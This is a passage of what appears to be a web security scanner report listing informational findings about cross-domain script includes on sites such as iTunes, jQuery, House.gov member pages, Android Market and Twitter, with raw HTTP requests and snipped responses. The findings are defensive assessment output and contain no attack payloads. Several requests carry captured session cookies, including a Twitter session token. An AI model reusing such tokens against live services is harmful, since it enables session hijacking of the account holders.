<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</script>


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/C3A6/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/C3A6/web-storefront-preview.jsz"></script>
...[SNIP]...

13.11. http://itunes.apple.com/us/app/delaware-gov/id444422872  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/delaware-gov/id444422872

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/delaware-gov/id444422872 HTTP/1.1
Host: itunes.apple.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 13 Jul 2011 01:59:37 GMT
x-apple-orig-url-path: /us/app/delaware-gov/id444422872
x-apple-application-site: NWK
x-apple-max-age: 3600
x-apple-aka-ttl: Generated Tue Jul 12 18:59:37 PDT 2011, Expires Tue Jul 12 19:00:37 PDT 2011, TTL 60s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=444422872&cc=us
x-apple-application-instance: 1003010
Content-Type: text/html; charset=UTF-8
x-webobjects-loadaverage: 0
Content-Length: 27271
Vary: Accept-Encoding
Cache-Control: no-transform, max-age=60
Date: Wed, 13 Jul 2011 01:59:37 GMT
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</script>


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/C3A6/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/C3A6/web-storefront-preview.jsz"></script>
...[SNIP]...

13.12. http://javascript.nwbox.com/IEContentLoaded/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://javascript.nwbox.com
Path:   /IEContentLoaded/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /IEContentLoaded/ HTTP/1.1
Host: javascript.nwbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 10:42:14 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Wed, 29 Jun 2011 03:41:36 GMT
ETag: "463a-8fb19c00"
Accept-Ranges: bytes
Content-Length: 17978
Cache-Control: max-age=259200
Expires: Sat, 16 Jul 2011 10:42:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>IECo
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

13.13. http://jquery.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 06 Jul 2011 18:13:44 GMT
ETag: "49602dc-34a9-8f932600"
Accept-Ranges: bytes
Content-Length: 13481
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

13.14. http://jquery.malsup.com/cycle/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.malsup.com
Path:   /cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cycle/ HTTP/1.1
Host: jquery.malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:10 GMT
Server: mod_security2/2.5.7
Last-Modified: Mon, 09 May 2011 12:21:31 GMT
ETag: "10cdf89-1efb-4a2d6e12768c0"
Accept-Ranges: bytes
Content-Length: 7931
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.15. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 13 Jul 2011 01:52:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

13.16. http://maloney.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maloney.house.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: maloney.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:25:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: 8af8813af5d363f10c9b5f145dc6f833=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:25:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 37821

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</div>
<script src="http://twitterjs.googlecode.com/svn/trunk/src/twitter.min.js" type="text/javascript">
</script>
...[SNIP]...

13.17. http://malsup.com/jquery/cycle/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jquery/cycle/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:14 GMT
Server: mod_security2/2.5.7
Last-Modified: Mon, 09 May 2011 12:21:31 GMT
ETag: "10cdf89-1efb-4a2d6e12768c0"
Accept-Ranges: bytes
Content-Length: 7931
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.18. https://market.android.com/details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /details

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /details?id=com.avai.amp.pbn_delaware HTTP/1.1
Host: market.android.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jul 2011 01:59:59 GMT
Expires: Wed, 13 Jul 2011 01:59:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 63772

<!DOCTYPE html><!--
Content-type: Preventing MHTML XSS in IE.

--><html><head><script type="text/javascript">function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t
...[SNIP]...
</script><script src="https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US"></script>
...[SNIP]...
</script><script src="https://apis.google.com/js/plusone.js">{"lang": "en_US"}</script>
...[SNIP]...

13.19. https://market.android.com/developer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /developer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developer?pub=My+Local+TV HTTP/1.1
Host: market.android.com
Connection: keep-alive
Referer: https://market.android.com/details?id=com.genwi.delaware
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=9cae866da36d6f34:TM=1310522402:LM=1310522402:S=Vufsd0X4Ov5c6tLC; NID=48=VB2kjZD9U7lL0X5uVLO8CGkeV3LlNTexxDeK5xpGpR0miadYsojCwg0qEcRa01gcj7UmK83UBT_BdbsjeNk4fxQErDPrh6J4wrWEszjQL6iYbEaav3xrsou2T0DMJdba

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jul 2011 02:00:24 GMT
Expires: Wed, 13 Jul 2011 02:00:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 49394

<!DOCTYPE html><!--
Content-type: Preventing MHTML XSS in IE.

--><html><head><script type="text/javascript">function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t
...[SNIP]...
</script><script src="https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US"></script>
...[SNIP]...
</script><script src="https://apis.google.com/js/plusone.js">{"lang": "en_US"}</script>
...[SNIP]...

13.20. https://market.android.com/static/client/js/1968918977-site_js_compiled_site_js.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /static/client/js/1968918977-site_js_compiled_site_js.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /static/client/js/1968918977-site_js_compiled_site_js.js HTTP/1.1
Host: market.android.com
Connection: keep-alive
Referer: https://market.android.com/details?id=com.avai.amp.pbn_delaware
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Expires: Thu, 11 Aug 2011 01:06:07 GMT
Date: Tue, 12 Jul 2011 01:06:07 GMT
Last-Modified: Wed, 06 Jul 2011 22:53:47 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 210105
Age: 89634

function f(a){throw a;}var i=void 0,m=null;function aa(){return function(){}}function ba(a){return function(b){this[a]=b}}function n(a){return function(){return this[a]}}function q(a){return function(
...[SNIP]...
</a><script src="https://www.google.com/buzz/api/button.js"><\/script>
...[SNIP]...

13.21. http://medienfreunde.com/lab/innerfade/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
                   <script type="text/javascript"
                    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

   </script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...

13.22. http://nj.gov/education/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nj.gov
Path:   /education/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /education/ HTTP/1.1
Host: nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:24 GMT
Content-length: 16838
Content-type: text/html
Last-modified: Fri, 17 Jun 2011 18:44:34 GMT
Etag: "41c6-4dfba092"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="En">


<head>


<meta h
...[SNIP]...
<!-- include jQuery library -->

<script type="text/javascript"

src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js">
</script>
...[SNIP]...
<!-- tabbed content library -->

<script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js"></script>
...[SNIP]...

13.23. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.register.com
Path:   /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:39:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW804dg/MAAlLm; expires=Sat, 13-Jul-13 11:39:31 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11791
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<script language=javascript type=text/javascript> \n');
document.write ('<!-- -- START: POP TYPE CONTROLS -- --> \n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_pop_under.js" async="async" defer="defer" charset="utf-8"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_ifrm.js" charset="utf-8"></script>
...[SNIP]...

13.24. http://peteking.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peteking.house.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: peteking.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: USHR Webserver Ver 5.4.1
Content-Type: text/html
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-Length: 15433
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="C
...[SNIP]...
</div>
               <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
               <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/RepPeteKing.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...

13.25. http://qandanj.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qandanj.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: qandanj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:53:07 GMT
Content-Length: 20482
Content-Type: text/html
Content-Location: http://qandanj.org/index.htm
Last-Modified: Tue, 22 Mar 2011 05:33:59 GMT
Accept-Ranges: bytes
ETag: "7aeb5be52e8cb1:715"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<link rel="shortcut icon" href="http://www.qandanj.org/qandan
...[SNIP]...
</div>
<script id="qp.bootstrap" type="text/javascript" src="http://www.questionpoint.org/crs/js/qwidget/qp.bootstrap.js?langcode=1&instid=11817&skin=blue&size=small" charset="utf-8">//<noscript>
...[SNIP]...

13.26. http://rangel.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rangel.house.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: rangel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
Server: U.S. House of Representatives
Date: Wed, 13 Jul 2011 01:53:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0857/Toolbar_857929/Loader_857929.js" type="text/javascript"></script>
...[SNIP]...

13.27. http://tonko.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tonko.house.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: tonko.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 53922
Content-Type: text/html
Content-Location: http://tonko.house.gov/index.html
Last-Modified: Fri, 08 Jul 2011 14:47:30 GMT
Accept-Ranges: bytes
ETag: "cf40dcf67d3dcc1:1720a"
X-Powered-By: ASP.NET
Server: U. S. House of Representatives
Date: Wed, 13 Jul 2011 01:44:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Congressman Paul Ton
...[SNIP]...
</script> <script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAVes5csel_qwD1lOMzHrYChQSK9YX4UZozh22jMbx5s4oUaO7hhSPLRb2xqj9RlQIDobCvpWtzFoGNA"></script>
...[SNIP]...
</a> <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

13.28. http://twitter.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwixoD0hMQE6%250AB2lkIiU5OWExZDRmMWUzN2U3MzU3MTZiMTI2Zjc0NDNmODVhNzoMY3NyZl9p%250AZCIlY2FhNmZmMWMzY2YwMWUxNTYyYWQ4NzgyMGRmMGJlMTgiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--50bfdb52e14835d473c0b9478dd99f22193f449a; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.4.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:06:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522800-71865-3084
ETag: "605d04975bd04dbcd5af5dbcf382d8c9"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:06:40 GMT
X-Runtime: 0.03641
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: ee9849c5dfc40ffaec37fd046b2f29f18a437fd8
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 14650
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1310499774/javascripts/twitter.js?1309893581" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1310499774/javascripts/lib/jquery.tipsy.min.js?1309893581" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1310499774/javascripts/lib/gears_init.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1310499774/javascripts/lib/mustache.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1310499774/javascripts/geov1.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1310499774/javascripts/api.js?1309893581" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="http://a3.twimg.com/a/1310499774/javascripts/layout_newtwitter.js?1309893581" type="text/javascript"></script>
...[SNIP]...

13.29. http://visitnj.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://visitnj.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
